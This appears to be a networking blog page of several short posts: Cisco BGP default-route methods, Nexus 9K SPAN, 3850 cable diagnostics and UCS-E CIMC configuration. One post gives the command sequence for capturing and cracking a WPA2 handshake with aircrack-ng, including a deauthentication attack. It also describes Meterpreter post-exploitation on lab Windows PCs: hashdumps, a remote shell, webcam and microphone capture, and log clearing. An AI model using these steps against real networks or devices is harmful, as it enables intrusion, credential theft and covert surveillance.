Advertising a default route in BGP

There are four ways to distribute a default route in BGP.

Three of them, the network 0.0.0.0, the default-information originate and redistribution from another routing protocol, are all similar in the resulting effect: they will inject the default route into BGP RIB and it will be advertised to all BGP neighbors. The difference is in the origin of the default route that is injected into BGP. Specifically:

  • network 0.0.0.0 will inject the default route into BGP only if the default route is currently present in the routing table.
  • redistribution will inject the default route into BGP only if the default route is currently present in the routing table and if it has been learned by a specific source protocol we are redistributing from.
  • default-information originate causes the default route to be artificially generated and injected into the BGP RIB, regardlessly of whether it is present in the routing table. The newly injected default will be advertised to all BGP peers (because it now resides in the BGP RIB)

The fourth method:

  • neighbor X.X.X default-originate is similar to the default-information originate in that the default route is “artificially generated” (it does not need to be present in the routing table in order to make the advertisement effective)*.
  • However, the neighbor X.X.X.X default-originate is different from the the default-information originate in that the default route will be advertised only to this specific BGP neighbor and not to all existing BGP neighbors as with the previous approaches. The default route will not be installed in the BGP RIB of the router that is configured with the neighbor X.X.X.X default-originate command and so it won’t be generally advertised to all BGP neighbors.

*By doing the ‘default-originate’, you request a routerA (provider A) to send a route 0.0.0.0/0 via BGP out to RouterB (customer B).This is useful in many cases where customer B doesn’t really want toaccept a full BGP feed(for example in stub autonomous systems).

Building a SPS Solution

Using MangoES with 3/4g intergrated corporate connectivity for management & monitoring. 👌🏼

Security insight: Cracking WPA2 and fun with Meterpreter

So my wife wasn’t well for most of the weekend and the kids are busy doing their stuff.  So I got some time to play around 🙂 on my home lab. – so here’s the thing:

It took me less than 5 mins to obtain a WPA2 handshake and less than 5 seconds to brute force the *.cap file that contained the password; post-handshake and obviously it’s only as good as your word list.
Key commands are:

airmonng
airmonng start
airodump-ng [monitor interface]
airodump-ng -c [channel] –bssid [bssid] -w /root/Desktop/ [monitor interface]
aireplay-ng –0 2 –a [router bssid] –c [client bssid] [monitor interface]
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

Further to that, and in about as much time as it took me to read up on Meterpreter, with recognition to Offensive Security.  I was able to access a couple of Windows PC’s on my test network. Not only was I able to access the target machines, I obtained a hashdump, took a screenshot, took remote control, opened a shell/cmd, downloaded a file and probably the most impressive and most worrying was the ability to run the remote webcam, taking a snap and a continuous stream, along with audio recording from the microphone on those target machines. :/  Oh…. and I cleared the logs as I left the scene – all within a couple of hours.

So keep those systems secure and up to date peeps!

Creating a SPAN session on a Nexus 9K

Create SPAN session
=================================
9kswitch# conf t
9kswitch(config)# monitor session 1

Configure destination port (destination cannot be a FEX port or a Port-channel!)
=================================
9kswitch# conf t
9kswitch(config)# interface eth 1/15
9kswitch(config-if)# switchport monitor
9kswitch(config-if)# exit
9kswitch(config)# monitor session 1
9kswitch(config-monitor)# destination interface eth 1/15

Configure source port (or VLAN)
=================================
9kswitch(config-monitor)# source interface eth 1/10
9kswitch(config-monitor)# source interface eth 1/11
or
9kswitch(config-monitor)# source vlan x

Activate a SPAN session
==================================
9kswitch(config)# no monitor session 1 shut

Display SPAN session
==================================
9kswitch# show monitor
or
9kswitch# show monitor session 1

conf t
monitor session 1
exit
int eth 1/15
switchport monitor
exit
monitor session 1
destination int eth 1/15
source int eth 1/10
source int eth 1/11
exit
no monitor session 1 shut

Cisco Nexus 9000: Configuring SPAN

Cisco 3850 – Power Diagnostics

Some handy commands for testing the interfaces power

3850Switch# test cable-diagnostics tdr interface gigabitEthernet 1/0/1

……wait a few seconds……..

3850Sswitch# sh cable-diagnostics tdr interface gigabitEthernet 1/0/1

Results should not read Normal not Open.

UCS-E160D-M2 Configuraiton

Basically there’s two options that i like to use when connecting to Cisco’s Integrated Management Console (CIMC).  Via the router connected to an address within the allocated subnet.  Although using this method you must add the host specific route to the ucse4/0 interface to provide access to the UCS-E module.

interface ucse4/0
description UCS-E Series CIMC Link
no ip unnumbered GigabitEthernet0/0
imc ip address 172.22.39.70 255.255.255.248 default-gateway 172.22.39.65
imc access-port shared-lom
!
ip route 172.22.39.70 255.255.255.255 ucse4/0

Alternatively, to manage the CIMC from your Data-vLAN add the below device configuration and use the dedicated console mode to provide access to the CIMC alone.  Ensure you put the console into the correct vLAN for management, in this case I’ll be using vLAN-901.

interface ucse4/0
description UCS-E Series CIMC Link
no ip unnumbered GigabitEthernet0/0
imc ip address 172.22.36.2 255.255.255.0 default-gateway 172.22.36.1
imc access-port dedicated console
end
!
Supporting a vMware configuration you will need to use x2 GigabitEthernet ports for redundancy / fail-over. These are GE2 & G3 (GE1 is used for the Console) The x2 ports should be added to the Data-vLAN, and NIC teamed using VMware.

Summary of ports:

GigabitEthernet1/0/11 >> GE2
GigabitEthernet1/0/12 >> GE3
GigabitEthernet1/0/13 >> GE1 (Console Port)